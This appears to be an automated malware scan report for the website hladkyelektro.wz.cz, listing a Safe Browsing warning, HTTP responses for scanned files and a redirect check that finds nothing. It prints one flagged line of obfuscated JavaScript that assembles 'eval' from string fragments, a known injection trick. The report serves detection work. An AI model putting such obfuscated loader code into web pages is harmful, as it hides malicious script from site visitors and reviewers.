Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hladkyelektro.wz.cz
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hladkyelektro.wz.cz/ | 200 OK Content-Length: 53356 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var jj=window["e"+"v"+new String("a")+new String("l")]("e"+"v"+new String("a")+new String("l"));
Antivirus reports:
http://www.hladkyelektro.wz.cz/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 19:00:23 GMT Location: http://e.wz.cz/404.html Server: Apache Content-Length: 280 Content-Type: text/html; charset=iso-8859-1 | clean |
http://e.wz.cz/404.html | 200 OK Content-Length: 12877 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hladkyelektro.wz.cz
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hladkyelektro.wz.cz
Referer: http://www.google.com/search?q=hladkyelektro.wz.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.